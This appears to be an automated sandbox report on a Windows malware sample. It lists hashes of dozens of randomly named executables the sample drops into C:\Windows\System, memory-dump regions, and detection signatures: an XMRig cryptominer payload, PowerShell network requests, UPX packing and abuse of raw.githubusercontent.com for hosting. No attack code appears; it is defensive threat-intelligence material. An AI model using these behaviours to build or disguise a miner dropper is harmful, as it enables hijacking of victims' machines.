SHA256 a3c32bbcd30f3cc81b349a72b62874f1f6a1c4b55623d3f18496fad96dcd7978
SHA512 c5cb2b14c62f7125125625ad3ad4f1dfc0660deb79cc8c26fd272a6443ad66e72940cbd8b877e2465d950a031cc08ed89e5e6989efb85ba13d47bde426050cdf

memory/2348-7-0x000000013FA70000-0x000000013FE62000-memory.dmp

C:\Windows\system\DEwbDna.exe

MD5 17abcde531790f76b6d2dd5c223e31ae
SHA1 682cbe2a7a5b707e45ff5123a4fa97123f00d6b8
SHA256 874312ab73756547bae9c3cd7483ba8ebd2b4064444473988f6a81aa04004679
SHA512 b3a3e7dafcb8767152bc33325bc2ef67ef6bfc972752e32311c6ff836c4ef581fbb92369a39353721b35de565ef7f7b2ffb48048e095545e6d597330ec4b5c30

C:\Windows\system\jBcQhYe.exe

MD5 f137003a0e09e47be1036f24758c5383
SHA1 e1d64a68e1fd2d06c50b480db60cfc52851804f8
SHA256 e5811d4ac9d2c159dbb4ba3fa00e8e3a494c58bbb69530414b78ee849055c241
SHA512 318b4512d8ca9d2af39642c75cf610c419fbeafcdffbf0a91d29289924fcce3d14baf86ac05545afb7ae780bfbebf34c6b3e1244f2b75694050d9e3ba92c1063

memory/2272-21-0x000000013FA70000-0x000000013FE62000-memory.dmp

C:\Windows\system\tttNocG.exe

MD5 e703f18e5b5d791f159fc27214659aba
SHA1 903bd462a44849a3556d5096ee9e161ab47cd385
SHA256 907f12a8fb12b8dcc5859eb5adddaf6ec99e708fe658f170f5b6b475c2f4797f
SHA512 df24203a8c304bf6aff5b3d170f1382be49fab5da0a5ad4570f0abd166ac0b9910df7917c240b2fd1d84d0854b6248070a74a6e2410cbacd4cd0720f00bfabac

memory/2300-32-0x0000000002C70000-0x0000000002CF0000-memory.dmp

C:\Windows\system\sIwWnBa.exe

MD5 018191fefcece5e48923e6188968d1ca
SHA1 b1e1645fbfdcf1353ae0857d1a2a352ca9a40529
SHA256 a19620d0ebf885dd73a1b6723156036257487a6f9761cb135aad033f418a19b8
SHA512 5e71d791b3885ecd93fb9a699aa7edd96ff55c43f7a69bd613dec060e5cd40fd6ae57ac28610a90501bc579a5354032ac5fed1b186db0fdaf687717b459639dd

\Windows\system\xFkYNii.exe

MD5 82ff65188197d3770d1792b92551001b
SHA1 ab26306b2e777afff1db89f59e6c029b4160acdb
SHA256 04ef435959f2e6aca57411c351cf8abc37a89bddcfcf2d2d856fae85591b2ecc
SHA512 53f35e121147c8fda534d9e412f51d375c4e99521429808f75a5dafd0759ad1ecbee98e4c6ec650f2145627fa93f33134eb5a982a9cb59fb1ef1a3454350fbd9

C:\Windows\system\ebHpxrH.exe

MD5 77528348bbe27f4755134efc8c9d402f
SHA1 058ae29852208f2363aeef4a8c6a593e4e9ef91d
SHA256 4f6a1d6db7342592e0c8ca27182b1ac0e024472f8c2f06d6caa78da6ab0e5405
SHA512 802f335b4c336ad4e111b3e6849cb2049e1ece41b17642ab0baff4ca26b333f2b2cee729b1b35626b0c2b01b40118f4c5d9cee9efc846965616508a9ce237a90

memory/2348-39-0x00000000035D0000-0x00000000039C2000-memory.dmp

memory/2348-35-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

C:\Windows\system\zdadgdg.exe

MD5 d25b28d99d349bc613bc8d69796bc251
SHA1 e35d3959a9c3ec8797f48cb9c4a0db18b020717c
SHA256 3fdbaca33ad3a3d820272efd230c3c315dae39d8dd68c8f3c3e2aec7fe9dfd70
SHA512 6c1ac1f0a66b1b1a2d17e53a5b15fc3f691dffb4c5b227aafdc3af971070c614a1f09ca99c950396f66f463af2d049269c433422ac9dbd866a287784e3b078cb

memory/2300-63-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

C:\Windows\system\PIDbzEL.exe

MD5 48b4fbc77c01ec724d98a352e4fef3d4
SHA1 bf0d957404406416cf599afefd9ca76c5db67d2b
SHA256 4525bd61d93b665b910af4ef21c4fab0828b4babd83be660e899b060bdb2d83e
SHA512 43e81d0646fc7b6dbab740535a6f6680741bae61456c9f526fd13b1185b5f66dc2da9352949c25e0a2b72a34f98201e7558bd59660815eef71d0d45c6e15a730

\Windows\system\QpTyTVj.exe

MD5 b01c351be26afec3ad35ccfa31160785
SHA1 dc6a9f06ae855c3768df5ede9c78c4cff0d2d3a0
SHA256 b7f777fc6c47bcf630355b5adb74837ad6b32c17b346650bc98de1f1d536bba4
SHA512 a5841c3a26cfd9c8e1dda0044d95d5cee8dd184cae91b619df7859dbc0fc77bea101b0a7b22eef2258aad1f0a96f8121fd3a4f07edc18f6b171c49c2b6e5ad61

\Windows\system\tEImjCa.exe

MD5 0e82580fb53249405655b5334ef6345b
SHA1 03482ec986d18794add78efc10a05489bac73a31
SHA256 4f9b1ef5e16c5cdc9a1f1ce2e8e274d3f042ee59d01507275a3d3e183cb1fd39
SHA512 bbd6f8c662d7388966f8cbdb9271d6f5c9450d02a871652365ae0e453bbe84bc124a23bc0c19b2b734bf26fa0e1ab95e3c3ebfe29284518d1905086a3d2e6541

memory/2348-109-0x000000013FCD0000-0x00000001400C2000-memory.dmp

memory/2972-79-0x000000013FA60000-0x000000013FE52000-memory.dmp

C:\Windows\system\nnDxpye.exe

MD5 c0c376b32e39c0507d7c0b5f3b08cd42
SHA1 92c6d5886d0116accffc47665f8352e7e52f24e0
SHA256 97f4b1c63822951ef33d6d1aba02224dba1d27fd6f867e9e411f5b7d569a936e
SHA512 9a1c418a557735d5605cdf46c3af73f028393d37b8ce01e110991428c757289c6da608d7668c9f0e8ab03ed0538fe8be97931144ba69d104fc2c69f870678cda

\Windows\system\ZBfARBT.exe

MD5 0b01c8b0217338c4c7f227433f35f200
SHA1 229964d428395023abc1463299bc4d9566ccf7da
SHA256 3a789405afd7e24e304e56766e66206cb90508d62f816bd4cc288aa4bcc99474
SHA512 3256e6a41140d189b303aa7e8ce213de4a82dd978ea72350f185c572c2d2fde092812601f159891876c3e3e795a0367145475be659e962deee03a081f9ed5577

C:\Windows\system\JAmRzzh.exe

MD5 6ef5683b1f84dd0862dde6b427b689c0
SHA1 d485962f73f9b50ed969740b50eff41397b2c1b1
SHA256 1f3f08cc06dc86ed75808bd113c13bae8552d0aab1759347dae8ea368e819a78
SHA512 699a0eafda29dffaafedf58dd0822b7dd34ad704b7b55ad31366ca3e666592ebea4e914aef6d261d6a4b80e606dade057090b0e9cb67daf76e41e1d2407b5a2e

C:\Windows\system\qptySaA.exe

MD5 e2837cf7349631d712f1564b9a455f44
SHA1 c934163bb68ad0ac07fcfb5452a93ad0db3fc3d5
SHA256 f7bbb347d8666bf3f35535d95fef18397b86e9b30cf22f0e2bc10dad7023a826
SHA512 c5476625786d7ef428f2d55d53cbf8e6de796e27b533df313c9eaea2ace4ee2b0b99a97ac804e97142e73ec8324a7843d7f87f3b65c57ff5dc35994def004648

C:\Windows\system\AkzluIL.exe

MD5 1f906eb076839cf619f93bdef6274640
SHA1 103a0d7e3f6a50a2fad18edcb79051b1c2b8a17e
SHA256 e57b77876c326be8ebccadb9c067642ffd595d20bebafededcb6491030a901a0
SHA512 d1cf9abc04d406fbc6ef8f2f870c916e1808c0385413b6b091f7c998d888c685c15fb7b6ed6f892bca6a80b450f772de73eca103bc3c2963a81a5c6bd780df34

\Windows\system\KwBrXPP.exe

MD5 99e422e5c563363b9b83206e6673cc0c
SHA1 9fc46f0caf3c7a4f2c1e4faa330a35906180e88f
SHA256 2cc0a099d2803c40b8a7ff6a240b749c42e836da57e1dfc47aec1117c88da62c
SHA512 42336f813177d69d221b091608faaae2e843f5b2ef0b9f1dd88264f894c7db86165762db3f2a8efd7593efbeb3e00de8750af277d5847255e74486a88346e6ad

\Windows\system\brlnahK.exe

MD5 1cb30f32d2529ca9d8cfa93990939fa8
SHA1 c2aa04b98bce6b3c096aa86003be697095f352af
SHA256 e6f7bdab287c3740e751c78b7c4ee696ae7661bc085a5e53e3b4727fc9bb38c7
SHA512 939955344c05d6e4092fafe0030fa345a1852511f8a01517f2ce34bc2ac4337ba1b23dbf648f55bd222856628f06520deb8c6318de4c9475c2a8194f65f8c821

\Windows\system\ZZYpJDG.exe

MD5 633c16b534106047590c625775113547
SHA1 415f75259bce6bd33822854a1655a19bd1151928
SHA256 4b382a5aacd8f59663b50af377e8865d7f4a87e174d83f5c84e451145fa79d14
SHA512 58115d82115f201a688747c1cfaa977e324df8c52e08d1be3eb0b703636f51233dd4005c0146d4ca9a56b54e112da5d8d39c4bf6069fdb8505fb7b8bf9358433

\Windows\system\XODUMtS.exe

MD5 317d88f4b290e68017eda7a692e51640
SHA1 3efd2fea5a9f15b9e4f9aca2ffd27d2f0f1113b7
SHA256 c272583a94356c1add3394688f66fc7c1db39e95ea6e8cb00341d1d6a14eef19
SHA512 96b7d981de211061deb303c8a58b12adb52ec0f3265564545abc25bb55c55260e385b1df87607d180b04abfb62657f095a59d076b1c4318c265e82864c7f9703

\Windows\system\lbYyMSG.exe

MD5 3067e0060ce21a50e15bdf470703b8aa
SHA1 652d63738c5043ba5b182559643bdc953b79f3f3
SHA256 1efcdf4298b9597a09c8062837c02a7ec8085bb9b25f8a973ca4c7e408d5be84
SHA512 946694dbeaafb2d2affebc630729e373b5e30c5e20f6a9b2be81615746df02aaf4a47f5fd0b59ea41a67c7d0b92e0e582ae1b0a310a875a172fcc5a61036d849

\Windows\system\vDkrPrV.exe

MD5 d11b585c38c689e316880773a2a6cdce
SHA1 4e41ce9eef27564a7e53842cba83bedaae059a45
SHA256 44752327aacbf9c1967ba11c1c2d839bb1bd081864934f3ab9732529baa32cf6
SHA512 952c1090d0630f6a52382f79fc8da6c55ed91d00798f0de09fd29b833d1e0a8736aa04d1a4110359b37941822bf00a9bc3a1d6ceeffd2a9261390a8aaa59aa15

C:\Windows\system\LPRaNIX.exe

MD5 082f2fe0a5002148f9f1e7b70eecfd53
SHA1 c5f2345d71c46a4cb1936d25dcfec0c958166b4d
SHA256 98377c74fff11d76b81a48a99d67f17d10e6fa7532520f747e2202ae66cae725
SHA512 e30012e372a74fbdfd00f8096a2d6829986bd6267dccb1b44c8b7795dfa685edb589968f383946d596ba1a66df27e0a9a44d8f3e5f2f0a2772f99626e0160096

\Windows\system\lTdoEQY.exe

MD5 f6439d409ceda186f748b70a80b738c9
SHA1 21a34447c6aa7b5ce62221d5a16777b192c0656b
SHA256 032f65dc0813cf29ae68bd812e26db456ade8e16d2ec1ea5c84893ad315d32da
SHA512 807ee6bc4678aca0f6384e9e6936988fe99d5110656005494ec372fe5dcb00840dcf4c71fbbf3121841ebdf689b8baa7174ed4621645813dc287771cfbf8ebff

C:\Windows\system\LnujtEy.exe

MD5 83b316b4085243a10c70400d5bcb3092
SHA1 da1280e44a8597749b480879389783285f63ab87
SHA256 87040b2a28ded358617c2d6e6eafdc1b737d60bbe797cab6db6e5465a58bcadf
SHA512 bc3a6e644043913da7d54cb069a3f42b2aae163d77c690488834d194ce3b42c3404ff225e65a9285b77b24db6ca2756adf00bc4bdf961daf331103d864a1595a

\Windows\system\XbvDRjO.exe

MD5 ba188820827432c7ee4d7dee6f116e98
SHA1 006e3140eec249bdbe96635c76a4ec7aa20a3b09
SHA256 c473626984210c1f44f34f3af713bc3fb4621a1a05085eff5bb474f317d8a493
SHA512 6b37e040c5224ae58a421577f2e0ae53e89ed7dc84bad48b763ee0d9a1144a21dde078b48d13207a7f622773119bb83b909ee0c33b6f3fd6f514183a73551b4f

\Windows\system\KXVVphN.exe

MD5 2c5c787d0f8b72f32d6be3e69f0b9387
SHA1 409d96f8a917db7cbb1bae0cd3e40d4bda2c074a
SHA256 bd2c97b148612436c2fd9b56b2c6d24b6d0fd54e86bef80b29e93f045a2df19c
SHA512 4f6a7648596b9e8a293324879bead27e24aaf6919395bfc62d4661eaa4f5962a125f1e52bc0cdad3937e74b99d2609d4e8f4da087bc71b21e54f1754da47e11a

memory/2984-97-0x000000013FB40000-0x000000013FF32000-memory.dmp

memory/2648-88-0x000000013FE20000-0x0000000140212000-memory.dmp

C:\Windows\system\OiZMVrb.exe

MD5 806aebe4a0e1a368fab391d24dd90cf7
SHA1 259cb4f13b03e8f4a04c534bd3ce930af08a7da2
SHA256 2b659a5333b1effbe2e2b8ef9f1811ac68bdfc3f6ae64a4c2f02af0fb065edfb
SHA512 3c61ec7039cc52fa22d61fa61bb041b0c1633925645b0131ece02b0175b0761a7231d9a82ab6730f8a22ffda78493b17cca06dd4e6d5b408d3082ad7dbbf58f4

C:\Windows\system\cGNIoNf.exe

MD5 ae86b227a83c2308025ce5d5a90654e9
SHA1 17e80f36f13c715150abfbf282f219e27dfc5180
SHA256 16c7195bbece5a2ab68f5d227fbf270d6387ee86a9a9c8346a835d9da9ab7bce
SHA512 07c2a1c4322483cb40ac960aaf68e2d5c6ab7a490cc0a625aa956535251f74abf78894f2299c25e60f769dc4f215aeb15835d73d36d65be8c7cef46f1e5b37f1

C:\Windows\system\viZeKFh.exe

MD5 8f0714bb1ff865f0f9e347b9fb9f16c8
SHA1 5aa6e12619ff1aca0fff0d7aa064b83a0fdd4cb5
SHA256 7136b381b1ad04921538a71fb1fce1ea64385582eea54adb6a0eab730a2d6ac9
SHA512 79dff178e99465d7f0e2f63641bf595f6aa97b28f553b7a9741764095a74fb088c7a39a4059e349e1cefa41b5d5d3e27ad12b0ba4154d7d1047d90788a05d513

C:\Windows\system\tlLCerR.exe

MD5 4db22d3b858050b50468fe57118fc48f
SHA1 a120f70f4b45925cde568c50d078a3eb8c96d8ee
SHA256 2a71be43550a00efbd4c0b81e443e4b7f67a520ef534b89dd83ba3e54409c276
SHA512 bd086e1b33fed3032d439928aefcd1e3d0402d2bf3b58c3445a11a53c074cca105f2747f5eab3ec9d96d71c1458d7743330dddf454b6aae26326d478c7872b1c

C:\Windows\system\CmTYzrq.exe

MD5 786e3035cef5a3dd21f29c4c94d5adfe
SHA1 9ca4275ebe14f787473be5172f7b5fa5b70e127b
SHA256 12d235434158201dd36d85aadfcd444a8ec94900b88066a93e1e324f418bb3a6
SHA512 fe2d72bbdc8120853c9a450156213d1fa6edf6bbeda7a902690a461f193db1706ab1edd91dcb21cc0c799919b29efbb2109484dc6a7e394d2993024f49ac9613

C:\Windows\system\mlTjGPZ.exe

MD5 5128dbc909bd8fd5c4097f4a6ae03d7a
SHA1 8e941469a554ff7edf1c04e768c0cb7d7a22b0b8
SHA256 d5fc9b18c7c26beaf1490905da3ec89cee846ff07eb34c1949482d759f60ee8b
SHA512 02036d74f34b30f09d2d31926047ae8f5380398c4c4147e2674abf8759d7859d0dd3483b763fd3dc39d04c2d847e05b4ad52e200712c287d271f1d4224499602

memory/2348-78-0x000000013F240000-0x000000013F632000-memory.dmp

C:\Windows\system\TXMDJsx.exe

MD5 f2a2402a23e69045c46418fa6da0e0f7
SHA1 8a7060bcf7839235e1f543bd8378d03b201e637d
SHA256 68655b02d473baaff1e47a491546700a88929366bc2d848c92a42303e723186c
SHA512 4723aa0a97260e622d0b3a127a379b73c7cdac1437df071516b71e6627446f7bb1890a2d91eb1ad05a58fd54f7d6735a61f86f7a1f8afedb58d54813376f0d33

memory/2348-76-0x000000013FA60000-0x000000013FE52000-memory.dmp

memory/2828-74-0x000000013FC10000-0x0000000140002000-memory.dmp

memory/2348-113-0x000000013FD20000-0x0000000140112000-memory.dmp

C:\Windows\system\kpIZRHh.exe

MD5 8231763b0b41a6b89bbcbd12bf526eca
SHA1 7fc39620b3b364b46c407e9dfe23a893b8cc8a41
SHA256 8edb04e244e424c938bf0204786b24e24b238856c57401633ce81d732e6d5bae
SHA512 715ac82c6e56840c909764363d0565436b339652409e659b0115232cfc09e9db5728c1be61a6f7ec9bc78be3aa365f31dde90a2d4c6864c02e591ba6d7e93ff1

memory/2300-107-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2348-92-0x000000013FB40000-0x000000013FF32000-memory.dmp

memory/2272-84-0x000000013FA70000-0x000000013FE62000-memory.dmp

memory/1944-64-0x000000013FC70000-0x0000000140062000-memory.dmp

C:\Windows\system\NqTNEDg.exe

MD5 2e482fff4072f47ed3fba116a2c21735
SHA1 6369d83065bb43bf67972df50bdbe651e9e5625e
SHA256 d560b4dbe722d34cf3b984bb14e8d1e38522279b960c0d56b4f80a045ceb5758
SHA512 8542a83e641547677675d31ab13d393aae881f2c8287736067a61a8d8197c8131f5f0a62fdefd2c2ebfa05545fc01e6f60d94e5da3b04ea0b0d2599a99165abf

memory/2476-61-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/2348-60-0x000000013FC70000-0x0000000140062000-memory.dmp

memory/2348-59-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/2428-58-0x000000013F620000-0x000000013FA12000-memory.dmp

memory/2300-56-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2348-55-0x00000000035D0000-0x00000000039C2000-memory.dmp

memory/1940-53-0x000000013F390000-0x000000013F782000-memory.dmp

memory/2348-70-0x000000013FC10000-0x0000000140002000-memory.dmp

memory/2576-34-0x000000013F1A0000-0x000000013F592000-memory.dmp

memory/2348-33-0x000000013FE20000-0x0000000140212000-memory.dmp

memory/2644-31-0x000000013FBC0000-0x000000013FFB2000-memory.dmp

memory/2348-29-0x0000000003170000-0x0000000003562000-memory.dmp

memory/2648-27-0x000000013FE20000-0x0000000140212000-memory.dmp

C:\Windows\system\GinEsZK.exe

MD5 3f9cfe8a165fbe5ed357bf4fb6550d1a
SHA1 d1f76cef8b11f404ce3021901f1968e523167625
SHA256 fe7331c05f745b95f5509c04136ec2be8073cae1c2054bbe90290f3a5e3a1c01
SHA512 7c297d93de1529b68ba232f55d08c5bdfcf13a5c3741f810e605eeec9da08911d3d07e6bd5c21436fbf2be3db2070f19515d3ae2f1e7604c2ff2f34139c616ce

C:\Windows\system\WbZkefu.exe

MD5 ef758e56e906b9892f08e5e0fd0f13b2
SHA1 5d91983aa1bb61c5754ee9a01242f0bb098e7d43
SHA256 55949f339b372645d839eaa0847f4e244396f7e39c4586ddc776fb793deda110
SHA512 efd8bb7ef71cf583c97f5d0eac4e2fae239c80d85643b80c586971498ace127bb0c9565e46052e55211bb3dead5ae54145b84fc68e9ff4a6be2a5f6b0f086760

memory/1944-7042-0x000000013FC70000-0x0000000140062000-memory.dmp

memory/2984-7047-0x000000013FB40000-0x000000013FF32000-memory.dmp

memory/2476-7059-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/2428-7062-0x000000013F620000-0x000000013FA12000-memory.dmp

memory/2828-7219-0x000000013FC10000-0x0000000140002000-memory.dmp

memory/2648-7268-0x000000013FE20000-0x0000000140212000-memory.dmp

memory/2972-7348-0x000000013FA60000-0x000000013FE52000-memory.dmp

memory/1940-8175-0x000000013F390000-0x000000013F782000-memory.dmp

memory/2272-8239-0x000000013FA70000-0x000000013FE62000-memory.dmp

memory/2348-13772-0x000000013FB40000-0x000000013FF32000-memory.dmp

memory/2348-14116-0x000000013FCD0000-0x00000001400C2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 16:08

Reported

2024-05-25 16:10

Platform

win10v2004-20240426-en

Max time kernel

91s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\PuHgCKg.exe N/A
N/A N/A C:\Windows\System\ShEInBR.exe N/A
N/A N/A C:\Windows\System\BsFBNxF.exe N/A
N/A N/A C:\Windows\System\nVICBBS.exe N/A
N/A N/A C:\Windows\System\lHSyrMt.exe N/A
N/A N/A C:\Windows\System\dvDcKme.exe N/A
N/A N/A C:\Windows\System\eIXnFtY.exe N/A
N/A N/A C:\Windows\System\gZMRnqY.exe N/A
N/A N/A C:\Windows\System\FLyqUmH.exe N/A
N/A N/A C:\Windows\System\bYsaOcR.exe N/A
N/A N/A C:\Windows\System\NZRmyog.exe N/A
N/A N/A C:\Windows\System\PgCyeDU.exe N/A
N/A N/A C:\Windows\System\UvYZVXs.exe N/A
N/A N/A C:\Windows\System\htIKkOL.exe N/A
N/A N/A C:\Windows\System\iGiIrhU.exe N/A
N/A N/A C:\Windows\System\ysbayia.exe N/A
N/A N/A C:\Windows\System\erUvdcv.exe N/A
N/A N/A C:\Windows\System\ZYuODNQ.exe N/A
N/A N/A C:\Windows\System\rxzjnAz.exe N/A
N/A N/A C:\Windows\System\EKpULeb.exe N/A
N/A N/A C:\Windows\System\qkgmUNv.exe N/A
N/A N/A C:\Windows\System\xSqnjAu.exe N/A
N/A N/A C:\Windows\System\HaskdEV.exe N/A
N/A N/A C:\Windows\System\YYlJRxL.exe N/A
N/A N/A C:\Windows\System\fJXdyIQ.exe N/A
N/A N/A C:\Windows\System\VKoHOcE.exe N/A
N/A N/A C:\Windows\System\nKLdfOV.exe N/A
N/A N/A C:\Windows\System\KLUwUZh.exe N/A
N/A N/A C:\Windows\System\owIqajs.exe N/A
N/A N/A C:\Windows\System\KeZkeEJ.exe N/A
N/A N/A C:\Windows\System\uTuUecx.exe N/A
N/A N/A C:\Windows\System\mMMhDYB.exe N/A
N/A N/A C:\Windows\System\eeDksRd.exe N/A
N/A N/A C:\Windows\System\kQbRmCr.exe N/A
N/A N/A C:\Windows\System\vIbyXoz.exe N/A
N/A N/A C:\Windows\System\xGIhIAx.exe N/A
N/A N/A C:\Windows\System\qLZGrly.exe N/A
N/A N/A C:\Windows\System\hegkKeo.exe N/A
N/A N/A C:\Windows\System\ZHkRXJy.exe N/A
N/A N/A C:\Windows\System\HbIXCUu.exe N/A
N/A N/A C:\Windows\System\OmusjIW.exe N/A
N/A N/A C:\Windows\System\ndcGhFA.exe N/A
N/A N/A C:\Windows\System\FHiIwkQ.exe N/A
N/A N/A C:\Windows\System\KkotzWu.exe N/A
N/A N/A C:\Windows\System\kwTJBaQ.exe N/A
N/A N/A C:\Windows\System\UqILQbE.exe N/A
N/A N/A C:\Windows\System\sxeWtRh.exe N/A
N/A N/A C:\Windows\System\MPceemw.exe N/A
N/A N/A C:\Windows\System\CkMBQgE.exe N/A
N/A N/A C:\Windows\System\RzsmTms.exe N/A
N/A N/A C:\Windows\System\jTUQPZT.exe N/A
N/A N/A C:\Windows\System\XcGGkrV.exe N/A
N/A N/A C:\Windows\System\ekjtatz.exe N/A
N/A N/A C:\Windows\System\CHoGFQH.exe N/A
N/A N/A C:\Windows\System\JGEAzdc.exe N/A
N/A N/A C:\Windows\System\IjUdRbS.exe N/A
N/A N/A C:\Windows\System\xjUPPhj.exe N/A
N/A N/A C:\Windows\System\jWDgbMp.exe N/A
N/A N/A C:\Windows\System\xsbcCwL.exe N/A
N/A N/A C:\Windows\System\WuHISGO.exe N/A
N/A N/A C:\Windows\System\xymikGd.exe N/A
N/A N/A C:\Windows\System\xUElmLI.exe N/A
N/A N/A C:\Windows\System\NkuUdRt.exe N/A
N/A N/A C:\Windows\System\ynlYOrR.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\YdYxjiQ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\DihKPds.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\uAQKjoS.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\bOkrQbd.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\pQrTdVD.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\JXKIMnB.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\QkGEZHk.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ebdATAJ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\vIbyXoz.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\QNAydyt.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\tTADidI.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\lOfxheM.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\qOvTvEU.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\qiPIyCy.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\jMqqDaC.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\CsrAwop.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\wWvYbCg.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\etWBKrb.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\AerwMmZ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ODMmlla.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\DmywDti.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
